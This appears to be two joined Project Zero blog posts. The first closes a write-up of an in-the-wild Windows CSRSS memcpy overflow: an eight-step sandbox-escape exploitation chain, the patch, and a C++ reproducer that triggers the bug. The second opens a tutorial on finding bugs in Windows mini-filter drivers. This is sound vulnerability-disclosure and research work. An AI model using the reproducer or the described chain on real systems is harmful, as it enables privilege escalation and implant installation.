  Context = _ACTCTXGENCTX::_ACTCTXGENCTX(Context);

} else {

  FusionpTraceAllocFailure(v14);

  SetLastError(0xE);

  goto error;

}

if (GenActCtxParams->ApplicationNameBuffer &&

    GenActCtxParams->ApplicationNameCapacity) {

  Context->ApplicationNameBuffer = GenActCtxParams->ApplicationNameBuffer;

  Context->ApplicationNameCapacity = GenActCtxParams->ApplicationNameCapacity;

}

Ultimately, sxs!CNodeFactory::

XMLParser_Element_doc_assembly_assemblyIdentity calls memcpy that can go past the end of the capture buffer:

IdentityNameBuffer = 0;

IdentityNameLength = 0;

SetLastError(0);

if (!SxspGetAssemblyIdentityAttributeValue(0, v11, &s_IdentityAttribute_name,

                                           &IdentityNameBuffer,

                                           &IdentityNameLength)) {

  CallSiteInfo = off_16506FA20;

  goto error;

}

if (IdentityNameLength &&

    IdentityNameLength < Context->ApplicationNameCapacity) {

  memcpy(Context->ApplicationNameBuffer, IdentityNameBuffer,

         2 * IdentityNameLength + 2);

  Context->ApplicationNameLength = IdentityNameLength;

} else {

  *Context->ApplicationNameBuffer = 0;

  Context->ApplicationNameLength = 0;

}

The source data for the memcpy call comes from the name parameter of the main assemblyIdentity node in the manifest.

Exploitation

Even though the vulnerability was present in older versions of Windows, the exploit only targets Windows 10. All major builds up to 18363 are supported.

As a result of the vulnerability, the attacker can call memcpy with fully controlled contents and size. This is one of the best initial primitives a memory corruption bug can provide, but there’s one potential issue. So far it seems like the bug allows the attacker to write data either past the end of the capture buffer in a shared memory region, which they can already write to from the sandboxed process, or past the end of the shared region, in which case it’s quite difficult to reliably make a “useful” allocation right next to the region. Luckily for the attacker, the vulnerable code actually operates on a copy of the original capture buffer, which is made by csrsrv!CsrCaptureArguments to avoid potential issues caused by concurrent modification of the buffer contents, and the copy is allocated in the regular heap.

The logical first step of the exploit would be to leak some data needed for an ASLR bypass. However, the following design quirks in Windows and CSRSS make it unnecessary:

  • Windows randomizes module addresses once per boot, and csrss.exe is a regular user-mode process. This means that the attacker can use modules loaded in both csrss.exe and the compromised sandboxed process, for example, ntdll.dll, for code-reuse attacks.

  • csrss.exe provides client processes with its virtual address of the shared region during initialization so they can adjust pointers for API calls. The offset between the “local” and “remote” addresses is stored in ntdll!CsrPortMemoryRemoteDelta. Thus, the attacker can store, e.g., fake structures needed for the attack in the shared mapping at a predictable address.

The exploit also has to bypass another security feature, Microsoft’s Control Flow Guard, which makes it significantly more difficult to jump into a code reuse gadget chain via an indirect function call. The attacker has decided to exploit the CFG’s inability to protect return addresses on the stack to gain control of the instruction pointer. The complete algorithm looks as follows:

1. Groom the heap. The exploit makes a preliminary CreateActivationContext call with a specially crafted manifest needed to massage the heap into a predictable state. It contains an XML node with numerous attributes in the form aa:aabN="BB...BB”. The manifest for the second call, which actually triggers the vulnerability, contains similar but different-sized attributes.

2. Implement write-what-where. The buffer overflow is used to overwrite the contents of XMLParser::_MY_XML_NODE_INFO nodes. _MY_XML_NODE_INFO may optionally contain a pointer to an internal character buffer. During subsequent parsing, if the current element is a numeric character entity (i.e. a string in the form &#x01234;), the parser calls XMLParser::CopyText to store the decoded character in the internal buffer of the currently active _MY_XML_NODE_INFO node. Therefore, by overwriting multiple nodes, the exploit can write data of any size to a controlled address.

3. Overwrite the loaded module list. The primitive gained in the previous step is used to modify the pointer to the loaded module list located in the PEB_LDR_DATA structure inside ntdll.dll, which is possible because the attacker has already obtained the base address of the library from the sandboxed process. The fake module list consists of numerous LDR_MODULE entries and is stored in the shared memory region. The unofficial definition of the structure is shown below:

typedef struct _LDR_MODULE {

  LIST_ENTRY InLoadOrderModuleList;

  LIST_ENTRY InMemoryOrderModuleList;

  LIST_ENTRY InInitializationOrderModuleList;

  PVOID BaseAddress;

  PVOID EntryPoint;

  ULONG SizeOfImage;

  UNICODE_STRING FullDllName;

  UNICODE_STRING BaseDllName;

  ULONG Flags;

  SHORT LoadCount;

  SHORT TlsIndex;

  LIST_ENTRY HashTableEntry;

  ULONG TimeDateStamp;

} LDR_MODULE, *PLDR_MODULE;

When a new thread is created, the ntdll!LdrpInitializeThread function will follow the module list and, provided that the necessary flags are set, run the function referenced by the EntryPoint member with BaseAddress as the first argument. The EntryPoint call is still protected by the CFG, so the exploit can’t jump to a ROP chain yet. However, this gives the attacker the ability to execute an arbitrary sequence of one-argument function calls.

4. Launch a new thread. The exploit deliberately causes a null pointer dereference. The exception handler in csrss.exe catches it and creates an error-reporting task in a new thread via csrsrv!CsrReportToWerSvc.

5. Restore the module list. Once the execution reaches the fake module list processing, it’s important to restore PEB_LDR_DATA’s original state to avoid crashes in other threads. The attacker has discovered that a pair of ntdll!RtlPopFrame and ntdll!RtlPushFrame calls can be used to copy an 8-byte value from one given address to another. The fake module list starts with such a pair to fix the loader data structure.

6. Leak the stack register. In this step the exploit takes full advantage of the shared memory region. First, it calls setjmp to leak the register state into the shared region. The next module entry points to itself, so the execution enters an infinite loop of NtYieldExecution calls. In the meantime, the sandboxed process detects that the data in the setjmp buffer has been modified. It calculates the return address location for the LdrpInitializeThread stack frame, sets it as the destination address for a subsequent copy operation, and modifies the InLoadOrderModuleList pointer of the current module entry, thus breaking the loop.

7. Overwrite the return address. After the exploit exits the loop in csrss.exe, it performs two more copy operations: overwrites the return address with a stack pivot pointer, and puts the fake stack address next to it. Then, when LdrpInitializeThread returns, the execution continues in the ROP chain.

8. Transition to winlogon.exe. The ROP payload creates a new memory section and shares it with both winlogon.exe, which is another highly-privileged Windows process, and the sandboxed process. Then it creates a new thread in winlogon.exe using an address inside the section as the entry point. The sandboxed process writes the final stage of the exploit to the section, which downloads and executes an implant. The rest of the ROP payload is needed to restore the normal state of csrss.exe and terminate the error reporting thread.

The fix

We reported the issue to Microsoft on March 23. Similarly to the font bugs, it was subject to a 7-day deadline used by Project Zero for actively exploited vulnerabilities, but after receiving a request from the vendor, we agreed to provide an extension due to the global circumstances surrounding COVID-19. The fix came out 22 days after our report.

The patch renamed BaseSrvSxsCreateActivationContext into BaseSrvSxsCreateActivationContextFromMessage and added an extra CsrValidateMessageBuffer call for the ApplicationName field, this time with MaximumLength as the size argument:

ApplicationName = ApiMessage->CreateActivationContext.ApplicationName;

if (ApplicationName.MaximumLength &&

    !CsrValidateMessageBuffer(ApiMessage, &ApplicationName.Buffer,

                              ApplicationName.MaximumLength, 1)) {

  SavedMaximumLength = ApplicationName.MaximumLength;

  ApplicationName.MaximumLength = ApplicationName.Length + 2;

}

[...]

if (SavedMaximumLength)

  ApiMessage->CreateActivationContext.ApplicationName.MaximumLength =

      SavedMaximumLength;

return result;

Appendix A

The following reproducer has been tested on Windows 10.0.18363.959.

#include <stdint.h>

#include <stdio.h>

#include <windows.h>

#include <string>

const char* MANIFEST_CONTENTS =

    "<?xml version='1.0' encoding='UTF-8' standalone='yes'?>"

    "<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>"

    "<assemblyIdentity name='@' version='1.0.0.0' type='win32' "

    "processorArchitecture='amd64'/>"

    "</assembly>";

const WCHAR* NULL_BYTE_STR = L"\x00\x00";

const WCHAR* MANIFEST_NAME =

  L"msil_system.data.sqlxml.resources_b77a5c561934e061_3.0.4100.17061_en-us_"

  L"d761caeca23d64a2.manifest";

const WCHAR* PATH = L"\\\\.\\c:Windows\\";

const WCHAR* MODULE = L"System.Data.SqlXml.Resources";

typedef PVOID(__stdcall* f_CsrAllocateCaptureBuffer)(ULONG ArgumentCount,

                                                     ULONG BufferSize);

f_CsrAllocateCaptureBuffer CsrAllocateCaptureBuffer;

typedef NTSTATUS(__stdcall* f_CsrClientCallServer)(PVOID ApiMessage,

                                                   PVOID CaptureBuffer,

                                                   ULONG ApiNumber,

                                                   ULONG DataLength);

f_CsrClientCallServer CsrClientCallServer;

typedef NTSTATUS(__stdcall* f_CsrCaptureMessageString)(LPVOID CaptureBuffer,

                                                       PCSTR String,

                                                       ULONG Length,

                                                       ULONG MaximumLength,

                                                       PSTR OutputString);

f_CsrCaptureMessageString CsrCaptureMessageString;

NTSTATUS CaptureUnicodeString(LPVOID CaptureBuffer, PSTR OutputString,

                              PCWSTR String, ULONG Length = 0) {

  if (Length == 0) {

    Length = lstrlenW(String);

  }

  return CsrCaptureMessageString(CaptureBuffer, (PCSTR)String, Length * 2,

                                 Length * 2 + 2, OutputString);

}

int main() {

  HMODULE Ntdll = LoadLibrary(L"Ntdll.dll");

  CsrAllocateCaptureBuffer = (f_CsrAllocateCaptureBuffer)GetProcAddress(

      Ntdll, "CsrAllocateCaptureBuffer");

  CsrClientCallServer =

      (f_CsrClientCallServer)GetProcAddress(Ntdll, "CsrClientCallServer");

  CsrCaptureMessageString = (f_CsrCaptureMessageString)GetProcAddress(

      Ntdll, "CsrCaptureMessageString");

  char Message[0x220];

  memset(Message, 0, 0x220);

  PVOID CaptureBuffer = CsrAllocateCaptureBuffer(4, 0x300);

  std::string Manifest = MANIFEST_CONTENTS;

  Manifest.replace(Manifest.find('@'), 1, 0x2000, 'A');

  // There's no public definition of the relevant CSR_API_MSG structure.

  // The offsets and values are taken directly from the exploit.

  *(uint32_t*)(Message + 0x40) = 0xc1;

  *(uint16_t*)(Message + 0x44) = 9;

  *(uint16_t*)(Message + 0x59) = 0x201;

  // CSRSS loads the manifest contents from the client process memory;

  // therefore, it doesn't have to be stored in the capture buffer.

  *(const char**)(Message + 0x80) = Manifest.c_str();

  *(uint64_t*)(Message + 0x88) = Manifest.size();

  *(uint64_t*)(Message + 0xf0) = 1;

  CaptureUnicodeString(CaptureBuffer, Message + 0x48, NULL_BYTE_STR, 2);

  CaptureUnicodeString(CaptureBuffer, Message + 0x60, MANIFEST_NAME);

  CaptureUnicodeString(CaptureBuffer, Message + 0xc8, PATH);

  CaptureUnicodeString(CaptureBuffer, Message + 0x120, MODULE);

  // Triggers the issue by setting ApplicationName.MaxLength to a large value.

  *(uint16_t*)(Message + 0x122) = 0x8000;

  CsrClientCallServer(Message, CaptureBuffer, 0x10017, 0xf0);

}

This is part 6 of a 6-part series detailing a set of vulnerabilities found by Project Zero being exploited in the wild. To read the other parts of the series, see the introduction post.

Hunting for Bugs in Windows Mini-Filter Drivers

Posted by James Forshaw, Project Zero

In December Microsoft fixed 4 issues in Windows in the Cloud Filter and Windows Overlay Filter (WOF) drivers (CVE-2020-17103, CVE-2020-17134, CVE-2020-17136, CVE-2020-17139). These 4 issues were 3 local privilege escalations and a security feature bypass, and they were all present in Windows file system filter drivers. I’ve found a number of issues in filter drivers previously, including 6 in the LUAFV driver which implements UAC file virtualization.

 The purpose of a file system filter driver according to Microsoft is:

“A file system filter driver can filter I/O operations for one or more file systems or file system volumes. Depending on the nature of the driver, filter can mean log, observe, modify, or even prevent. Typical applications for file system filter drivers include antivirus utilities, encryption programs, and hierarchical storage management systems.”

What this boils down to is the filter driver can inspect and modify almost any IO request sent to a file system. This power comes with many responsibilities, and considering the complexity of the IO model on Windows it can be hard to avoid introducing subtle bugs.

With the issues being fixed I thought would be a good opportunity to go into a bit more detail on how you can research file system filter drivers, specifically the kind of things I looked at to find my security vulnerabilities. I’m going to give an overview of how filter drivers work, how you communicate with them, some hints on reverse engineering and some of the common security issues you might discover. I’ll also provide some basic example code to give you a basic idea of some common coding patterns. The goal is to allow you to do your own research in this area.

I’m assuming you have some prior knowledge on how the IO Manager works and have experience in finding security issues in non-filter drivers. Also I’m not claiming this to be an exhaustive description of bug hunting in filter drivers as the topic is very deep and complex. With this in mind let’s start with an overview of how a filter driver works.

Filter Driver Implementation

A filter driver exploits the way the Windows IO Manager implements file system drivers. When you make a request to access a file, such as calling the NtCreateFile system call the IO Manager allocates an IO Request Packet (IRP) structure which contains the operation type and all the parameters for the operation. The IRP is then dispatched to the top of the device stack associated with the request.

A filter driver registers for the IO requests it supports with a callback function which is invoked when a specific IO request type IRP is queued in the device stack. The driver callback can then do a number of different things to the IRP.

  • Pass the IRP unmodified directly to the next driver in the stack.
  • Modify the IRP then pass to the next driver.
  • Modify the IRP response.
  • Complete the IRP operation with a success result.
  • Complete the IRP operation with an error result.
  • Pass the IRP to a different device stack.

This is the basics of how a filter driver works, the driver is attached at a suitable point of a device stack and handles IO requests. When an IRP of interest is received it can perform one of the operations to filter requests. If it wants to inspect or modify the response it can register for the completion routine and handle the operation in the callback.

It’s important to note that the IRP doesn’t automatically propagate down the stack. A driver can choose to complete the IRP which means it’ll not be processed by any other driver down the stack. If the driver passes on the IRP the driver must register a completion routine otherwise it’ll not be notified when the IRP has been processed by the lower drivers in the stack.

For a file system filter the insertion point would typically be on top of the file system device object which is exposed by a file system driver such as NTFS. However, the driver can insert itself almost anywhere, allowing it to filter not just file system requests but also change data such as disk sectors. For example the Bitlocker Full Disk Encryption driver is a filter which is attached to the top of a volume block device. Any sectors passed in a write IRP are encrypted before passing to the lower driver. Read IRPs are handled in a completion routine and the sectors are decrypted before returning to the caller.

The Filter Manager and Mini-Filters

Implementing a filter driver from scratch is quite complicated. You have to handle every single IO request type, even if you don’t care about it, so that it can be forwarded to the next driver in the stack. You also have to find the correct point to insert your filter driver into the device stack. It’s easy to attach a driver to the top of the stack but trying to insert in the middle of an existing stack can be a recipe for disaster, for example the ordering of the filter drivers in the stack might differ depending on load order.

To make it easier to write a filter driver Windows comes with the Filter Manager Driver which takes care of handling IO requests and device stacks. This allows a developer to write what’s called a mini-filter driver instead of a, now named, legacy filter driver. The following diagram shows how the architecture changes when you introduce the filter manager.

As you can see the mini-filters don’t add their own device objects to the stack. Instead they are registered with the filter manager and it’s the filter manager which inserts its own device. The filter manager handles the IO requests and calls registered mini-filters to process the request. If your mini-filter doesn’t support a certain IO request then the filter manager implements a default which handles passing the IRP on to the next driver in the stack.

Another useful feature is the filter manager implements a mechanism for ordering the mini-filters, through an altitude value. The higher the altitude value the higher the priority. For example, a filter at altitude 10000 will be called before a filter at altitude 5000 when making a IO request. When handling responses the altitudes processed in reverse order, so the filter at 5000 will be called first then the one at 10000. Officially the altitude values must be registered with Microsoft. MSDN contains a list of the currently registered altitudes. However, there’s nothing to stop a driver from registering itself with a different altitude except it’ll likely draw the ire of Microsoft and might fail certification. By formalizing the altitude values you avoid the risk that a filter driver’s ordering may change depending on load order.

Mini-Filter Registration

A mini-filter driver registers its presence by calling the FltRegisterFilter filter manager API, normally during the driver’s entry point. The main parameter is a FLT_REGISTRATION structure which defines all the various callbacks for handling IO requests and bookkeeping. The important fields are the callbacks which a driver can register to respond to events from the filter manager. You can view what filters are registered with the filter manager using the fltmc command line tool (must be run as an administrator).

C:\> fltmc

Filter Name                     Num Instances    Altitude    Frame

------------------------------  -------------  ------------  -----

bindflt                                 1       409800         0

WdFilter                               17       328010         0

storqosflt                              1       244000         0

wcifs                                   0       189900         0

CldFlt                                  0       180451         0

FileCrypt                               0       141100         0

luafv                                   1       135000         0

npsvctrig                               1        46000         0

Wof                                    14        40700         0

FileInfo                               17        40500         0

We can see all the mini-filters registered, the number of instances which indicates the number of volumes that’s been attached and the altitude. There are 19 volumes available for filtering in the system I tested on (according to running fltmc volumes) so no filter is attached to everything. A driver can select and decide what volumes it wants to attach to by assigning an instance setup callback to the InstanceSetupCallback field in the filter registration structure. This callback is invoked for every volume on the system, including new ones added after the filter starts. The callback can return the status code STATUS_FLT_DO_NOT_ATTACH to block attachment.

You can view what volumes a filter is attached to using fltmc again:

C:\> fltmc instances -f luafv

Instances for luafv filter:

Volume Name     Altitude        Instance Name       Frame  VlStatus

------------- ------------  ----------------------  -----  --------

C:               135000     luafv                     0

This just shows the volume that LUAFV is attached to. As UAC virtualization only makes sense in the context of the system drive then it’s only attached to C:. You can manually attach and detach filters on volumes using the fltmc tool with the attach and detach commands, we’ll show an example of using these commands later.

NOTE: Just because a filter driver is attached to a volume it doesn’t mean it’ll filter any IO requests for that volume. For example, the WOF driver is attached to all NTFS volumes, however it’ll only enable itself if there’s at least one file in the volume which is registered to be handled by WOF. Otherwise it ignores the IO request, letting it complete normally.

Most mini-filters only attach to file system volumes. However, the filter manager also supports attaching to the named pipe and mailslot devices. The filter driver indicates support by setting the FLTFL_REGISTRATION_SUPPORT_NPFS_MSFS flag in the FLT_REGISTRATION structure.

Mini-Filter IO Request Operation Callbacks

By far the most important field in the FLT_REGISTRATION structure is OperationRegistration which references a list of FLT_OPERATION_REGISTRATION structures defining the IO request callbacks. Each entry contains the IRP major code for the operation (such as IRP_MJ_CREATE or IRP_MJ_FILE_SYSTEM_CONTROL) and can have a pre-request and post-request callback. The driver doesn’t need to specify both if it doesn’t need both. The list is a variable length array, terminated with the major code being set to IRP_MJ_OPERATION_END (0x80). Any operation not in the list is handled by the filter manager which typically just ignores it and continues to the next filter in the list. A basic example of what you might see in C code is shown below.

const FLT_OPERATION_REGISTRATION Callbacks[] = {

    { IRP_MJ_CREATE,

      0,

      PreCreateOperation,

      PostCreateOperation },

    { IRP_MJ_OPERATION_END }

};

A pre-request callback accepts three parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • An output pointer which can be assigned a callback context.

The prototype of the callback function pointer is:

typedef FLT_PREOP_CALLBACK_STATUS

(*PFLT_PRE_OPERATION_CALLBACK) (

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID *CompletionContext

    );

The parameters for the IO request are accessible in the FLT_CALLBACK_DATA structure’s Iopb field which is an FLT_IO_PARAMETER_BLOCK structure. The parameters are similar to the ones exposed through the IRP’s current IO_STACK_LOCATION structure. The data parameter also contains the IO_STATUS_BLOCK for the request and the caller’s requestor mode (either KernelMode or UserMode). The return code from the pre-request callback function determines what the filter driver wants to do with the request. The return type FLT_PREOP_CALLBACK_STATUS can be one of the following:

Name

Value

Description

FLT_PREOP_SUCCESS_WITH_CALLBACK

0

The callback was successful. Pass on the IO request and get a post-operation callback after completion.

FLT_PREOP_SUCCESS_NO_CALLBACK

1

The callback was successful. Pass on the IO request. No callback required.

FLT_PREOP_PENDING

2

Mark the IO operation as pending.

FLT_PREOP_DISALLOW_FASTIO

3

If handling a Fast IO operation, fail it to force the operation as a normal IO Request.

FLT_PREOP_COMPLETE

4

The operation has been completed. Do not pass on the IO request to any other drivers, even other filters in the stack.

FLT_PREOP_SYNCHRONIZE

5

Synchronize the post-operation callback in the same thread.

FLT_PREOP_DISALLOW_FSFILTER_IO

6

Disallow FastIO file creation.

A post-request callback accepts four parameters:

  • The parameters for the operation, specified in a FLT_CALLBACK_DATA structure.
  • Related kernel objects, in a FLT_RELATED_OBJECTS structure.
  • A context pointer which could have been assigned by the pre-operation callback.
  • Additional flags.

For post-operation callbacks the prototype is as follows:

typedef FLT_POSTOP_CALLBACK_STATUS

(*PFLT_POST_OPERATION_CALLBACK) (

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID CompletionContext,

    FLT_POST_OPERATION_FLAGS Flags

);

The parameters are more or less the same as for the pre-operation callback. The CompletionContext parameter is the same one assigned in the pre-operation callback. If this value was allocated the post-operation callback needs to free the memory buffer to prevent leaking memory. The FLT_POSTOP_CALLBACK_STATUS return type can be one of the following values.

Name

Value

Description

FLT_POSTOP_FINISHED_PROCESSING

0

The callback was successful. No further processing required.

FLT_POSTOP_MORE_PROCESSING_REQUIRED

1

Halts completion of the IO request. The operation will be pending until the filter driver completes it.

FLT_POSTOP_DISALLOW_FSFILTER_IO

2

Disallow FastIO file creation.

Handling IO Requests

Now that we’ve described registration of the mini-filter and its callbacks let's go through a few examples of how IO requests are handled inside the pre and post operation callbacks. We’ll use the six operations I mentioned earlier as a base for this discussion. Any examples are to demonstrate the likely code you’ll find in a driver but omits security checks and other unimportant details. This isn’t Stack Overflow, so please don’t copy and paste them into real drivers.

Pass the IO request unmodified

The simplest way of not modifying an IO request is to not specify a pre-operation callback. Of course we’re assuming the driver wants to handle an IO request selectively based on certain criteria so it must implement the callback.

The easiest way to ignore the IO request is to return the FLT_PREOP_SUCCESS_NO_CALLBACK status code from the pre-operation callback. That indicates to the filter manager that the mini-filter has completed its processing and is no longer interested in the IO request.

To give an example the following pre-create operation callback will ignore any open requests where the desired access does not request the FILE_WRITE_DATA access right. If the request doesn’t contain the access then the request is completed with no callback.

FLT_PREOP_CALLBACK_STATUS

PreCreateOperation(

    PFLT_CALLBACK_DATA Data,

    PCFLT_RELATED_OBJECTS FltObjects,

    PVOID* CompletionContext

) {

    PFLT_IO_PARAMETER_BLOCK ps = &Data->Iopb->Parameters;

    DWORD access = ps->Create.SecurityContext->DesiredAccess;

    if ((access & FILE_WRITE_DATA) == 0) {

        return FLT_PREOP_SUCCESS_NO_CALLBACK;

    }

    // Perform some operation...

}

The example extracts the desired access from the creation parameters. If the FILE_WRITE_DATA access right is not set then the filter driver will ignore the IO request entirely by returning the no callback status code.

Of course depending on the purpose of the filter driver it might still want the post-operation callback to be called. For example if the filter driver is monitoring file access then the post-operation callback will contain valuable information such as the success or failure of opening the file or the data read from the file. In this case it makes sense to return FLT_PREOP_SUCCESS_WITH_CALLBACK.

When the driver specified it wants a post-operation callback it can configure the CompletionContext with any value it likes. This context can then be used in the post-operation callback. This can be used to pass additional data between the callbacks so that it can perform its operation correctly.

Modify the IO request

During a pre-operation callback the driver can modify the contents of the FLT_CALLBACK_DATA structure. For example the driver could change the security context used to open the file or it could even change the name of the file itself. The driver must indicate to the filter manager that the data has been modified by setting the FLTFL_CALLBACK_DATA_DIRTY flag in the Flags field before returning. The correct way of setting the flag is to call the FltSetCallbackDataDirty API however all that currently does is set the flag.

Modify the IO request response

As with the request you can modify the response in the post-operation callback which will return the changes to higher mini-filters and the IO manager. One trick I’ve commonly seen is to use this to change the target file by modifying the file name and returning the status code STATUS_REPARSE as if the file system hand encountered a symbolic link. The following is the basic approach that the LUAFV driver uses to perform the reparse operation to an arbitrary file path in a post-operation callback.

FLT_POSTOP_CALLBACK_STATUS LuafvReparse(PFLT_CALLBACK_DATA Data, 

                                        PUNICODE_STRING TargetFileName){

  LuafvSetEcp(Data, TargetFileName);

  PFILE_OBJECT FileObject = Data->Iopb->TargetFileObject;

  ExFreePool(FileObject->FileName.Buffer);

  FileObject->FileName.Buffer = ExAllocatePool(PagedPool, 

                                        TargetFileName.Length);

  FileObject->FileName.MaximumLength = TargetFileName.Length;

  RtlCopyUnicodeString(&FileObject->FileName, TargetFileName);

  Data->IoStatus.Information = 0;

  Data->IoStatus.Status = STATUS_REPARSE;

  FltSetCallbackDataDirty(Data);

  return FLT_POSTOP_FINISHED_PROCESSING;

}

The code deallocates the filename buffer in the target file object and replaces it with its own. It then sets the status code to STATUS_REPARSE and indicates that processing has finished. In Windows 7 a IoReplaceFileObjectName API was introduced which makes this operation much less error prone, however LUAFV was written for Vista where the API didn’t exist so it had to make do. An official Microsoft example can be found in the SimRep sample driver.

One quirk of this operation is the FileName in the file object is volume relative, e.g. if you opened c:\windows\notepad.exe then FileName is set to \windows\notepad.exe. However, you can replace that with an absolute path such as \??\d:\abc.txt and that still works. Also the driver doesn’t need to create a real mount point or symbolic link reparse point buffer for this to work. The IO manager will just take the path from the file object and restart the create request with the new path.

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.

Complete the IO request with an error result.

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is the filter manager exposes a set of APIs which mirror the kernel IO APIs but will only dispatch the IO request to filters below the caller. For example you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using FltFindExtraCreateParameter API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

PREDIRECT_CONTEXT context = // Get driver’s allocated context.

if (context->FileObject) {

    Data->Iopb->TargetFileObject = context->FileObject;

    FltSetCallbackDataDirty(Data);

    return FLT_PREOP_SUCCESS_NO_CALLBACK;

}

Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is there's multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function, the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is the malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.

PSECURITY_DESCRIPTOR SecurityDescriptor;

FltBuildDefaultSecurityDescriptor(

  &SecurityDescriptor,

  FLT_PORT_ALL_ACCESS

);

UNICODE_STRING Name;

RtlInitUnicodeString(&Name, L"\\FilterPortName");

OBJECT_ATTRIBUTES ObjAttr;

InitializeObjectAttributes(&ObjAttr, &Name, 0, NULL, SecurityDescriptor);

PFLT_PORT Port;

FltCreateCommunicationPort(

  Filter,

  &Port,

  &ObjAttr,

  NULL,

  ConnectNotifyCallback,

  DisconnectNotifyCallback,

  MessageNotifyCallback,

  100

);

The name of the port is specified using an OBJECT_ATTRIBUTES structure, in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS

(*PFLT_CONNECT_NOTIFY) (

      PFLT_PORT ClientPort,

      PVOID ServerPortCookie,

      PVOID ConnectionContext,

      ULONG SizeOfContext,

      PVOID *ConnectionPortCookie

      );

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName            

----                                      --------            

storqosfltport                            FilterConnectionPort

MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort

MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort

WcifsPort                                 FilterConnectionPort

MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort

BindFltPort                               FilterConnectionPort

MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort

CLDMSGPORT                                FilterConnectionPort

MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client-end where FilterConnectionPort is the mini-filter server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ | 

Where-Object TypeName -eq "FilterConnectionPort"

PS> foreach($port in $ports.Name) {

    Write-Host "\$port"

    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}

}

\BindFltPort

Exception: "(0x80070005) - Access is denied."

\CLDMSGPORT

Exception: "(0x8007017C) - The cloud operation is invalid."

